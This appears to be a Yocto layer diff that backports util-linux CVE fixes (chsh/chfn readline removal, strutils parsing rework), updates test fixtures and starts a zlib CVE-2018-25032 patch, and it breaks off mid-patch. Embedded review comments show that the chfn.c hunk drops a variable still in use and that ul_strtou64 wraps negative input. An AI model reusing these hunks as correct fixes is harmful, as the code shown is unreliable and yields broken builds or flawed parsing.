+ | `-/home/kzak/.gvfs gvfs-fuse-daemon fuse.gvfs-fuse-daemon rw,nosuid,nodev,relatime,user_id=500,group_id=500
+ |-/var/lib/nfs/rpc_pipefs sunrpc rpc_pipefs rw,relatime
+-|-/mnt/sounds //foo.home/bar/ cifs rw,relatime,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344
+-`-/mnt/foo /fooooo bar rw,relatime
++`-/mnt/sounds //foo.home/bar/ cifs rw,relatime,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344
+ rc=0
+diff --git a/tests/expected/findmnt/outputs-force-tree b/tests/expected/findmnt/outputs-force-tree
+index 59495797bd..01599355ec 100644
+--- a/tests/expected/findmnt/outputs-force-tree
++++ b/tests/expected/findmnt/outputs-force-tree
+@@ -30,6 +30,5 @@ TARGET SOURCE FSTYPE OPTIO
+ |-/home/kzak /dev/mapper/kzak-home ext4 rw,noatime,barrier=1,data=ordered
+ | `-/home/kzak/.gvfs gvfs-fuse-daemon fuse.gvfs-fuse-daemon rw,nosuid,nodev,relatime,user_id=500,group_id=500
+ |-/var/lib/nfs/rpc_pipefs sunrpc rpc_pipefs rw,relatime
+-|-/mnt/sounds //foo.home/bar/ cifs rw,relatime,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344
+-`-/mnt/foo /fooooo bar rw,relatime
++`-/mnt/sounds //foo.home/bar/ cifs rw,relatime,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344
+ rc=0
+diff --git a/tests/expected/findmnt/outputs-kernel b/tests/expected/findmnt/outputs-kernel
+index 59495797bd..01599355ec 100644
+--- a/tests/expected/findmnt/outputs-kernel
++++ b/tests/expected/findmnt/outputs-kernel
+@@ -30,6 +30,5 @@ TARGET SOURCE FSTYPE OPTIO
+ |-/home/kzak /dev/mapper/kzak-home ext4 rw,noatime,barrier=1,data=ordered
+ | `-/home/kzak/.gvfs gvfs-fuse-daemon fuse.gvfs-fuse-daemon rw,nosuid,nodev,relatime,user_id=500,group_id=500
+ |-/var/lib/nfs/rpc_pipefs sunrpc rpc_pipefs rw,relatime
+-|-/mnt/sounds //foo.home/bar/ cifs rw,relatime,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344
+-`-/mnt/foo /fooooo bar rw,relatime
++`-/mnt/sounds //foo.home/bar/ cifs rw,relatime,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344
+ rc=0
+diff --git a/tests/expected/libmount/tabdiff-mount b/tests/expected/libmount/tabdiff-mount
+index 420aeacd5e..3c18f8dc4f 100644
+--- a/tests/expected/libmount/tabdiff-mount
++++ b/tests/expected/libmount/tabdiff-mount
+@@ -1,3 +1,2 @@
+ /dev/mapper/kzak-home on /home/kzak: MOUNTED
+-/fooooo on /mnt/foo: MOUNTED
+ tmpfs on /mnt/test/foo bar: MOUNTED
+diff --git a/tests/expected/libmount/tabdiff-move b/tests/expected/libmount/tabdiff-move
+index 24f9bc791b..95820d93ef 100644
+--- a/tests/expected/libmount/tabdiff-move
++++ b/tests/expected/libmount/tabdiff-move
+@@ -1,3 +1,2 @@
+ //foo.home/bar/ on /mnt/music: MOVED to /mnt/music
+-/fooooo on /mnt/foo: UMOUNTED
+ tmpfs on /mnt/test/foo bar: UMOUNTED
+diff --git a/tests/expected/libmount/tabdiff-remount b/tests/expected/libmount/tabdiff-remount
+index 82ebeab390..876bfd9539 100644
+--- a/tests/expected/libmount/tabdiff-remount
++++ b/tests/expected/libmount/tabdiff-remount
+@@ -1,4 +1,3 @@
+ /dev/mapper/kzak-home on /home/kzak: REMOUNTED from 'rw,noatime,barrier=1,data=ordered' to 'ro,noatime,barrier=1,data=ordered'
+ //foo.home/bar/ on /mnt/sounds: REMOUNTED from 'rw,relatime,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344' to 'ro,relatime,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344'
+-/fooooo on /mnt/foo: UMOUNTED
+ tmpfs on /mnt/test/foo bar: UMOUNTED
+diff --git a/tests/expected/libmount/tabdiff-umount b/tests/expected/libmount/tabdiff-umount
+index a3e0fe48a1..c7be725b92 100644
+--- a/tests/expected/libmount/tabdiff-umount
++++ b/tests/expected/libmount/tabdiff-umount
+@@ -1,3 +1,2 @@
+ /dev/mapper/kzak-home on /home/kzak: UMOUNTED
+-/fooooo on /mnt/foo: UMOUNTED
+ tmpfs on /mnt/test/foo bar: UMOUNTED
+diff --git a/tests/expected/libmount/tabfiles-parse-mountinfo b/tests/expected/libmount/tabfiles-parse-mountinfo
+index 47eb770061..d5ba5248e4 100644
+--- a/tests/expected/libmount/tabfiles-parse-mountinfo
++++ b/tests/expected/libmount/tabfiles-parse-mountinfo
+@@ -351,17 +351,6 @@ id: 47
+ parent: 20
+ devno: 0:38
+ ------ fs:
+-source: /fooooo
+-target: /mnt/foo
+-fstype: bar
+-optstr: rw,relatime
+-VFS-optstr: rw,relatime
+-FS-opstr: rw
+-root: /
+-id: 48
+-parent: 20
+-devno: 0:39
+------- fs:
+ source: tmpfs
+ target: /mnt/test/foo bar
+ fstype: tmpfs
+diff --git a/tests/expected/libmount/tabfiles-py-parse-mountinfo b/tests/expected/libmount/tabfiles-py-parse-mountinfo
+index 47eb770061..d5ba5248e4 100644
+--- a/tests/expected/libmount/tabfiles-py-parse-mountinfo
++++ b/tests/expected/libmount/tabfiles-py-parse-mountinfo
+@@ -351,17 +351,6 @@ id: 47
+ parent: 20
+ devno: 0:38
+ ------ fs:
+-source: /fooooo
+-target: /mnt/foo
+-fstype: bar
+-optstr: rw,relatime
+-VFS-optstr: rw,relatime
+-FS-opstr: rw
+-root: /
+-id: 48
+-parent: 20
+-devno: 0:39
+------- fs:
+ source: tmpfs
+ target: /mnt/test/foo bar
+ fstype: tmpfs
+diff --git a/tests/ts/findmnt/files/mountinfo b/tests/ts/findmnt/files/mountinfo
+index 475ea1a337..ff1e664a84 100644
+--- a/tests/ts/findmnt/files/mountinfo
++++ b/tests/ts/findmnt/files/mountinfo
+@@ -30,4 +30,3 @@
+ 44 41 0:36 / /home/kzak/.gvfs rw,nosuid,nodev,relatime - fuse.gvfs-fuse-daemon gvfs-fuse-daemon rw,user_id=500,group_id=500
+ 45 20 0:37 / /var/lib/nfs/rpc_pipefs rw,relatime - rpc_pipefs sunrpc rw
+ 47 20 0:38 / /mnt/sounds rw,relatime - cifs //foo.home/bar/ rw,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344
+-48 20 0:39 / /mnt/foo\040(deleted) rw,relatime - bar /fooooo rw
+diff --git a/tests/ts/findmnt/files/mountinfo-nonroot b/tests/ts/findmnt/files/mountinfo-nonroot
+index e15b467016..87b421d2ef 100644
+--- a/tests/ts/findmnt/files/mountinfo-nonroot
++++ b/tests/ts/findmnt/files/mountinfo-nonroot
+@@ -29,4 +29,3 @@
+ 44 41 0:36 / /home/kzak/.gvfs rw,nosuid,nodev,relatime - fuse.gvfs-fuse-daemon gvfs-fuse-daemon rw,user_id=500,group_id=500
+ 45 20 0:37 / /var/lib/nfs/rpc_pipefs rw,relatime - rpc_pipefs sunrpc rw
+ 47 20 0:38 / /mnt/sounds rw,relatime - cifs //foo.home/bar/ rw,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344
+-48 20 0:39 / /mnt/foo\040(deleted) rw,relatime - bar /fooooo rw
+diff --git a/tests/ts/libmount/files/mountinfo b/tests/ts/libmount/files/mountinfo
+index c063071833..2b01740481 100644
+--- a/tests/ts/libmount/files/mountinfo
++++ b/tests/ts/libmount/files/mountinfo
+@@ -30,5 +30,4 @@
+ 44 41 0:36 / /home/kzak/.gvfs rw,nosuid,nodev,relatime - fuse.gvfs-fuse-daemon gvfs-fuse-daemon rw,user_id=500,group_id=500
+ 45 20 0:37 / /var/lib/nfs/rpc_pipefs rw,relatime - rpc_pipefs sunrpc rw
+ 47 20 0:38 / /mnt/sounds rw,relatime - cifs //foo.home/bar/ rw,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344
+-48 20 0:39 / /mnt/foo\040(deleted) rw,relatime - bar /fooooo rw
+ 49 20 0:56 / /mnt/test/foo bar rw,relatime shared:323 - tmpfs tmpfs rw
diff --git a/meta/recipes-core/util-linux/util-linux/CVE-2022-0563.patch b/meta/recipes-core/util-linux/util-linux/CVE-2022-0563.patch
new file mode 100644
index 0000000000..54b496ea3f
--- /dev/null
+++ b/meta/recipes-core/util-linux/util-linux/CVE-2022-0563.patch
@@ -0,0 +1,161 @@
+From faa5a3a83ad0cb5e2c303edbfd8cd823c9d94c17 Mon Sep 17 00:00:00 2001
+From: Karel Zak <kzak@redhat.com>
+Date: Thu, 10 Feb 2022 12:03:17 +0100
+Subject: [PATCH] chsh, chfn: remove readline support [CVE-2022-0563]
+
+The readline library uses INPUTRC= environment variable to get a path
+to the library config file. When the library cannot parse the
+specified file, it prints an error message containing data from the
+file.
+
+Unfortunately, the library does not use secure_getenv() (or a similar
+concept) to avoid vulnerabilities that could occur if set-user-ID or
+set-group-ID programs.
+
+Reported-by: Rory Mackie <rory.mackie@trailofbits.com>
+Signed-off-by: Karel Zak <kzak@redhat.com>
+
+Upstream-status: Backport
+https://github.com/util-linux/util-linux/commit/faa5a3a83ad0cb5e2c303edbfd8cd823c9d94c17
+
+CVE: CVE-2022-0563
+
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ login-utils/Makemodule.am | 2 +-
+ login-utils/chfn.c | 16 +++------------
+ login-utils/chsh.c | 42 ++-------------------------------------
+ 3 files changed, 6 insertions(+), 54 deletions(-)
+
+diff --git a/login-utils/Makemodule.am b/login-utils/Makemodule.am
+index fac5bfc..73636af 100644
+--- a/login-utils/Makemodule.am
++++ b/login-utils/Makemodule.am
+@@ -82,7 +82,7 @@ chfn_chsh_sources = \
+ login-utils/ch-common.c
+ chfn_chsh_cflags = $(SUID_CFLAGS) $(AM_CFLAGS)
+ chfn_chsh_ldflags = $(SUID_LDFLAGS) $(AM_LDFLAGS)
+-chfn_chsh_ldadd = libcommon.la $(READLINE_LIBS)
++chfn_chsh_ldadd = libcommon.la
+
+ if CHFN_CHSH_PASSWORD
+ chfn_chsh_ldadd += -lpam
+diff --git a/login-utils/chfn.c b/login-utils/chfn.c
+index b739555..2f8e44a 100644
+--- a/login-utils/chfn.c
++++ b/login-utils/chfn.c
+@@ -56,11 +56,6 @@
+ # include "auth.h"
+ #endif
+
+-#ifdef HAVE_LIBREADLINE
+-# define _FUNCTION_DEF
+-# include <readline/readline.h>
+-#endif
+-
+ struct finfo {
+ char *full_name;
+ char *office;
+@@ -229,22 +224,17 @@ static char *ask_new_field(struct chfn_control *ctl, const char *question,
+ {
+ int len;
+ char *buf;
+-#ifndef HAVE_LIBREADLINE
+- size_t dummy = 0;
+-#endif
+
+ if (!def_val)
+ def_val = "";
++
+ while (true) {
+ printf("%s [%s]: ", question, def_val);
+ __fpurge(stdin);
+-#ifdef HAVE_LIBREADLINE
+- rl_bind_key('\t', rl_insert);
+- if ((buf = readline(NULL)) == NULL)
+-#else
++
+ if (getline(&buf, &dummy, stdin) < 0)
+-#endif
+ errx(EXIT_FAILURE, _("Aborted."));
++
+ /* remove white spaces from string end */
+ ltrim_whitespace((unsigned char *) buf);
+ len = rtrim_whitespace((unsigned char *) buf);
+diff --git a/login-utils/chsh.c b/login-utils/chsh.c
+index a9ebec8..ee6ff87 100644
+--- a/login-utils/chsh.c
++++ b/login-utils/chsh.c
+@@ -58,11 +58,6 @@
+ # include "auth.h"
+ #endif
+
+-#ifdef HAVE_LIBREADLINE
+-# define _FUNCTION_DEF
+-# include <readline/readline.h>
+-#endif
+-
+ struct sinfo {
+ char *username;
+ char *shell;
+@@ -121,33 +116,6 @@ static void print_shells(void)
+ endusershell();
+ }
+
+-#ifdef HAVE_LIBREADLINE
+-static char *shell_name_generator(const char *text, int state)
+-{
+- static size_t len;
+- char *s;
+-
+- if (!state) {
+- setusershell();
+- len = strlen(text);
+- }
+-
+- while ((s = getusershell())) {
+- if (strncmp(s, text, len) == 0)
+- return xstrdup(s);
+- }
+- return NULL;
+-}
+-
+-static char **shell_name_completion(const char *text,
+- int start __attribute__((__unused__)),
+- int end __attribute__((__unused__)))
+-{
+- rl_attempted_completion_over = 1;
+- return rl_completion_matches(text, shell_name_generator);
+-}
+-#endif
+-
+ /*
+ * parse_argv () --
+ * parse the command line arguments, and fill in "pinfo" with any
+@@ -198,20 +166,14 @@ static char *ask_new_shell(char *question, char *oldshell)
+ {
+ int len;
+ char *ans = NULL;
+-#ifdef HAVE_LIBREADLINE
+- rl_attempted_completion_function = shell_name_completion;
+-#else
+ size_t dummy = 0;
+-#endif
++
+ if (!oldshell)
+ oldshell = "";
+ printf("%s [%s]\n", question, oldshell);
+-#ifdef HAVE_LIBREADLINE
+- if ((ans = readline("> ")) == NULL)
+-#else
+ if (getline(&ans, &dummy, stdin) < 0)
+-#endif
+ return NULL;
++
+ /* remove the newline at the end of ans. */
+ ltrim_whitespace((unsigned char *) ans);
+ len = rtrim_whitespace((unsigned char *) ans);
+--
+2.25.1
+
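Review bot: In the embedded chfn.c hunk for `ask_new_field()`, the backport deletes `size_t dummy = 0;` together with its `#ifndef HAVE_LIBREADLINE` guard, yet the retained call `getline(&buf, &dummy, stdin)` still uses `dummy`. The hunk begins at the function's opening brace and shows only `int len;` and `char *buf;` as declarations, so as shown chfn.c would fail to compile in a build that enables chfn/chsh rather than pick up the INPUTRC fix. The chsh.c hunk keeps both `char *ans = NULL;` and `size_t dummy = 0;`; chfn.c should match it with `char *buf = NULL;` and `size_t dummy = 0;`, since getline() expects a NULL or malloc'd buffer pointer. The rest of `ask_new_field()` continues outside the hunk.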
diff --git a/meta/recipes-core/util-linux/util-linux/include-strutils-cleanup-strto-functions.patch b/meta/recipes-core/util-linux/util-linux/include-strutils-cleanup-strto-functions.patch
new file mode 100644
index 0000000000..5d5a370821
--- /dev/null
+++ b/meta/recipes-core/util-linux/util-linux/include-strutils-cleanup-strto-functions.patch
@@ -0,0 +1,270 @@
+From 84825b161ba5d18da4142893b9789b3fc71284d9 Mon Sep 17 00:00:00 2001
+From: Karel Zak <kzak@redhat.com>
+Date: Tue, 22 Jun 2021 14:20:42 +0200
+Subject: [PATCH] include/strutils: cleanup strto..() functions
+
+* add ul_strtos64() and ul_strtou64()
+* add simple test
+
+Addresses: https://github.com/karelzak/util-linux/issues/1358
+Signed-off-by: Karel Zak <kzak@redhat.com>
+
+Upstream-Backport: [https://github.com/util-linux/util-linux/commit/84825b161ba5d18da4142893b9789b3fc71284d9]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ include/strutils.h | 3 +
+ lib/strutils.c | 174 ++++++++++++++++++++++++++-------------------
+ 2 files changed, 105 insertions(+), 72 deletions(-)
+
+diff --git a/include/strutils.h b/include/strutils.h
+index e75a2f0e17..389e849905 100644
+--- a/include/strutils.h
++++ b/include/strutils.h
+@@ -19,6 +19,9 @@ extern int parse_size(const char *str, uintmax_t *res, int *power);
+ extern int strtosize(const char *str, uintmax_t *res);
+ extern uintmax_t strtosize_or_err(const char *str, const char *errmesg);
+
++extern int ul_strtos64(const char *str, int64_t *num, int base);
++extern int ul_strtou64(const char *str, uint64_t *num, int base);
++
+ extern int16_t strtos16_or_err(const char *str, const char *errmesg);
+ extern uint16_t strtou16_or_err(const char *str, const char *errmesg);
+ extern uint16_t strtox16_or_err(const char *str, const char *errmesg);
+diff --git a/lib/strutils.c b/lib/strutils.c
+index ee2c835495..d9976dca70 100644
+--- a/lib/strutils.c
++++ b/lib/strutils.c
+@@ -319,39 +319,80 @@ char *strndup(const char *s, size_t n)
+ }
+ #endif
+
+-static uint32_t _strtou32_or_err(const char *str, const char *errmesg, int base);
+-static uint64_t _strtou64_or_err(const char *str, const char *errmesg, int base);
++/*
++ * convert strings to numbers; returns <0 on error, and 0 on success
++ */
++int ul_strtos64(const char *str, int64_t *num, int base)
++{
++ char *end = NULL;
+
+-int16_t strtos16_or_err(const char *str, const char *errmesg)
++ errno = 0;
++ if (str == NULL || *str == '\0')
++ return -EINVAL;
++ *num = (int64_t) strtoimax(str, &end, base);
++
++ if (errno || str == end || (end && *end))
++ return -EINVAL;
++ return 0;
++}
++
++int ul_strtou64(const char *str, uint64_t *num, int base)
+ {
+- int32_t num = strtos32_or_err(str, errmesg);
++ char *end = NULL;
+
+- if (num < INT16_MIN || num > INT16_MAX) {
+- errno = ERANGE;
+- err(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
+- }
+- return num;
++ errno = 0;
++ if (str == NULL || *str == '\0')
++ return -EINVAL;
++ *num = (uint64_t) strtoumax(str, &end, base);
++
++ if (errno || str == end || (end && *end))
++ return -EINVAL;
++ return 0;
+ }
+
+-static uint16_t _strtou16_or_err(const char *str, const char *errmesg, int base)
++/*
++ * Covert strings to numbers and print message on error.
++ *
++ * Note that hex functions (strtox..()) returns unsigned numbers, if you need
++ * something else then use ul_strtos64(s, &n, 16).
++ */
++int64_t strtos64_or_err(const char *str, const char *errmesg)
+ {
+- uint32_t num = _strtou32_or_err(str, errmesg, base);
++ int64_t num = 0;
+
+- if (num > UINT16_MAX) {
+- errno = ERANGE;
+- err(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
++ if (ul_strtos64(str, &num, 10) != 0) {
++ if (errno == ERANGE)
++ err(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
++
++ errx(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
+ }
+ return num;
+ }
+
+-uint16_t strtou16_or_err(const char *str, const char *errmesg)
++uint64_t strtou64_or_err(const char *str, const char *errmesg)
+ {
+- return _strtou16_or_err(str, errmesg, 10);
++ uint64_t num = 0;
++
++ if (ul_strtou64(str, &num, 10)) {
++ if (errno == ERANGE)
++ err(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
++
++ errx(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
++ }
++ return num;
+ }
+
+-uint16_t strtox16_or_err(const char *str, const char *errmesg)
++uint64_t strtox64_or_err(const char *str, const char *errmesg)
+ {
+- return _strtou16_or_err(str, errmesg, 16);
++ uint64_t num = 0;
++
++ if (ul_strtou64(str, &num, 16)) {
++ if (errno == ERANGE)
++ err(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
++
++ errx(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
++ }
++ return num;
+ }
+
+ int32_t strtos32_or_err(const char *str, const char *errmesg)
+@@ -365,9 +406,9 @@ int32_t strtos32_or_err(const char *str, const char *errmesg)
+ return num;
+ }
+
+-static uint32_t _strtou32_or_err(const char *str, const char *errmesg, int base)
++uint32_t strtou32_or_err(const char *str, const char *errmesg)
+ {
+- uint64_t num = _strtou64_or_err(str, errmesg, base);
++ uint64_t num = strtou64_or_err(str, errmesg);
+
+ if (num > UINT32_MAX) {
+ errno = ERANGE;
+@@ -376,66 +417,48 @@ static uint32_t _strtou32_or_err(const char *str, const char *errmesg, int base)
+ return num;
+ }
+
+-uint32_t strtou32_or_err(const char *str, const char *errmesg)
+-{
+- return _strtou32_or_err(str, errmesg, 10);
+-}
+-
+ uint32_t strtox32_or_err(const char *str, const char *errmesg)
+ {
+- return _strtou32_or_err(str, errmesg, 16);
++ uint64_t num = strtox64_or_err(str, errmesg);
++
++ if (num > UINT32_MAX) {
++ errno = ERANGE;
++ err(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
++ }
++ return num;
+ }
+
+-int64_t strtos64_or_err(const char *str, const char *errmesg)
++int16_t strtos16_or_err(const char *str, const char *errmesg)
+ {
+- int64_t num;
+- char *end = NULL;
+-
+- errno = 0;
+- if (str == NULL || *str == '\0')
+- goto err;
+- num = strtoimax(str, &end, 10);
+-
+- if (errno || str == end || (end && *end))
+- goto err;
++ int64_t num = strtos64_or_err(str, errmesg);
+
+- return num;
+-err:
+- if (errno == ERANGE)
++ if (num < INT16_MIN || num > INT16_MAX) {
++ errno = ERANGE;
+ err(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
+-
+- errx(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
++ }
++ return num;
+ }
+
+-static uint64_t _strtou64_or_err(const char *str, const char *errmesg, int base)
++uint16_t strtou16_or_err(const char *str, const char *errmesg)
+ {
+- uintmax_t num;
+- char *end = NULL;
+-
+- errno = 0;
+- if (str == NULL || *str == '\0')
+- goto err;
+- num = strtoumax(str, &end, base);
+-
+- if (errno || str == end || (end && *end))
+- goto err;
++ uint64_t num = strtou64_or_err(str, errmesg);
+
+- return num;
+-err:
+- if (errno == ERANGE)
++ if (num > UINT16_MAX) {
++ errno = ERANGE;
+ err(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
+-
+- errx(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
++ }
++ return num;
+ }
+
+-uint64_t strtou64_or_err(const char *str, const char *errmesg)
++uint16_t strtox16_or_err(const char *str, const char *errmesg)
+ {
+- return _strtou64_or_err(str, errmesg, 10);
+-}
++ uint64_t num = strtox64_or_err(str, errmesg);
+
+-uint64_t strtox64_or_err(const char *str, const char *errmesg)
+-{
+- return _strtou64_or_err(str, errmesg, 16);
++ if (num > UINT16_MAX) {
++ errno = ERANGE;
++ err(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
++ }
++ return num;
+ }
+
+ double strtod_or_err(const char *str, const char *errmesg)
+@@ -1051,15 +1051,25 @@ static int test_strutils_cmp_paths(int a
+
+ int main(int argc, char *argv[])
+ {
+- if (argc == 3 && strcmp(argv[1], "--size") == 0)
++ if (argc == 3 && strcmp(argv[1], "--size") == 0) {
+ return test_strutils_sizes(argc - 1, argv + 1);
+
+- else if (argc == 4 && strcmp(argv[1], "--cmp-paths") == 0)
++ } else if (argc == 4 && strcmp(argv[1], "--cmp-paths") == 0) {
+ return test_strutils_cmp_paths(argc - 1, argv + 1);
+
++ } else if (argc == 3 && strcmp(argv[1], "--str2num") == 0) {
++ uint64_t n;
++
++ if (ul_strtou64(argv[2], &n, 10) == 0) {
++ printf("'%s' --> %ju\n", argv[2], (uintmax_t) n);
++ return EXIT_SUCCESS;
++ }
++ }
++
+ else {
+ fprintf(stderr, "usage: %1$s --size <number>[suffix]\n"
+- " %1$s --cmp-paths <path> <path>\n",
++ " %1$s --cmp-paths <path> <path>\n"
++ " %1$s --num2num <str>\n",
+ argv[0]);
+ exit(EXIT_FAILURE);
+ }
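Review bot: `ul_strtou64()` in the lib/strutils.c hunk accepts a leading minus sign, because `strtoumax()` negates the parsed value instead of failing and the only checks afterwards are `errno`, `str == end` and trailing characters. A negative string therefore comes back as a wrapped unsigned value with return code 0, and the `strtou16/32/64_or_err()` and `strtox..()` wrappers built on it inherit that behaviour. The removed `_strtou64_or_err()` behaved the same way, but this patch turns the parser into an exported helper, so it is worth rejecting the sign before the conversion, for example `if (strchr(str, '-')) return -EINVAL;` directly after the NULL/empty check. Separately, a failed `--str2num` parse in the test `main()` neither prints the usage text nor returns a failure code in the lines shown, and the usage string names the option `--num2num`.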
diff --git a/meta/recipes-core/util-linux/util-linux_2.35.1.bb b/meta/recipes-core/util-linux/util-linux_2.35.1.bb
index 516b783887..89dc564ecb 100644
--- a/meta/recipes-core/util-linux/util-linux_2.35.1.bb
+++ b/meta/recipes-core/util-linux/util-linux_2.35.1.bb
@@ -11,6 +11,11 @@ SRC_URI += "file://configure-sbindir.patch \
file://0001-libfdisk-script-accept-sector-size-ignore-unknown-he.patch \
file://0001-kill-include-sys-types.h-before-checking-SYS_pidfd_s.patch \
file://0001-include-cleanup-pidfd-inckudes.patch \
+ file://CVE-2021-37600.patch \
+ file://include-strutils-cleanup-strto-functions.patch \
+ file://CVE-2021-3995.patch \
+ file://CVE-2021-3996.patch \
+ file://CVE-2022-0563.patch \
"
SRC_URI[md5sum] = "7f64882f631225f0295ca05080cee1bf"
SRC_URI[sha256sum] = "d9de3edd287366cd908e77677514b9387b22bc7b88f45b83e1922c3597f1d7f9"
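Review bot: `include-strutils-cleanup-strto-functions.patch` is the one entry added to SRC_URI here without a CVE identifier, and nothing in the recipe records why a 270-line rework of the number-parsing helpers is included alongside the CVE fixes. It is listed directly before `CVE-2021-3995.patch`, so it is presumably a prerequisite for that backport. Its patch header should say so, with a line such as `Prerequisite for CVE-2021-3995.patch and CVE-2021-3996.patch` (to be confirmed against those patches), so that a later audit or patch refresh does not drop it. The order of these entries matters for the same reason and should be kept as is.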
diff --git a/meta/recipes-core/volatile-binds/files/volatile-binds.service.in b/meta/recipes-core/volatile-binds/files/volatile-binds.service.in
index b23355a714..4b34ebd12d 100644
--- a/meta/recipes-core/volatile-binds/files/volatile-binds.service.in
+++ b/meta/recipes-core/volatile-binds/files/volatile-binds.service.in
@@ -1,6 +1,6 @@
[Unit]
Description=Bind mount volatile @where@
-DefaultDependencies=false
+DefaultDependencies=no
Before=local-fs.target
RequiresMountsFor=@whatparent@ @whereparent@
ConditionPathIsReadWrite=@whatparent@
diff --git a/meta/recipes-core/zlib/zlib/CVE-2018-25032.patch b/meta/recipes-core/zlib/zlib/CVE-2018-25032.patch
new file mode 100644
index 0000000000..5cb6183641
--- /dev/null
+++ b/meta/recipes-core/zlib/zlib/CVE-2018-25032.patch
@@ -0,0 +1,347 @@
+CVE: CVE-2018-25032
+Upstream-Status: Backport
+Signed-off-by: Ross Burton <ross.burton@arm.com>
+
+From 5c44459c3b28a9bd3283aaceab7c615f8020c531 Mon Sep 17 00:00:00 2001
+From: Mark Adler <madler@alumni.caltech.edu>
+Date: Tue, 17 Apr 2018 22:09:22 -0700
+Subject: [PATCH] Fix a bug that can crash deflate on some input when using
+ Z_FIXED.
+
+This bug was reported by Danilo Ramos of Eideticom, Inc. It has
+lain in wait 13 years before being found! The bug was introduced
+in zlib 1.2.2.2, with the addition of the Z_FIXED option. That
+option forces the use of fixed Huffman codes. For rare inputs with
+a large number of distant matches, the pending buffer into which
+the compressed data is written can overwrite the distance symbol
+table which it overlays. That results in corrupted output due to
+invalid distances, and can result in out-of-bound accesses,
+crashing the application.
+
+The fix here combines the distance buffer and literal/length
+buffers into a single symbol buffer. Now three bytes of pending
+buffer space are opened up for each literal or length/distance
+pair consumed, instead of the previous two bytes. This assures
+that the pending buffer cannot overwrite the symbol table, since
+the maximum fixed code compressed length/distance is 31 bits, and
+since there are four bytes of pending space for every three bytes
+of symbol space.
+---
+ deflate.c | 74 ++++++++++++++++++++++++++++++++++++++++---------------
+ deflate.h | 25 +++++++++----------
+ trees.c | 50 +++++++++++--------------------------
+ 3 files changed, 79 insertions(+), 70 deletions(-)
+
+diff --git a/deflate.c b/deflate.c
+index 425babc00..19cba873a 100644
+--- a/deflate.c
++++ b/deflate.c
+@@ -255,11 +255,6 @@ int ZEXPORT deflateInit2_(strm, level, method, windowBits, memLevel, strategy,
+ int wrap = 1;
+ static const char my_version[] = ZLIB_VERSION;
+
+- ushf *overlay;
+- /* We overlay pending_buf and d_buf+l_buf. This works since the average
+- * output size for (length,distance) codes is <= 24 bits.
+- */
+-
+ if (version == Z_NULL || version[0] != my_version[0] ||
+ stream_size != sizeof(z_stream)) {
+ return Z_VERSION_ERROR;
+@@ -329,9 +324,47 @@ int ZEXPORT deflateInit2_(strm, level, method, windowBits, memLevel, strategy,
+
+ s->lit_bufsize = 1 << (memLevel + 6); /* 16K elements by default */
+
+- overlay = (ushf *) ZALLOC(strm, s->lit_bufsize, sizeof(ush)+2);
+- s->pending_buf = (uchf *) overlay;
+- s->pending_buf_size = (ulg)s->lit_bufsize * (sizeof(ush)+2L);
++ /* We overlay pending_buf and sym_buf. This works since the average size
++ * for length/distance pairs over any compressed block is assured to be 31
++ * bits or less.
++ *
++ * Analysis: The longest fixed codes are a length code of 8 bits plus 5
++ * extra bits, for lengths 131 to 257. The longest fixed distance codes are
++ * 5 bits plus 13 extra bits, for distances 16385 to 32768. The longest
++ * possible fixed-codes length/distance pair is then 31 bits total.
++ *
++ * sym_buf starts one-fourth of the way into pending_buf. So there are
++ * three bytes in sym_buf for every four bytes in pending_buf. Each symbol
++ * in sym_buf is three bytes -- two for the distance and one for the
++ * literal/length. As each symbol is consumed, the pointer to the next
++ * sym_buf value to read moves forward three bytes. From that symbol, up to
++ * 31 bits are written to pending_buf. The closest the written pending_buf
++ * bits gets to the next sym_buf symbol to read is just before the last
++ * code is written. At that time, 31*(n-2) bits have been written, just
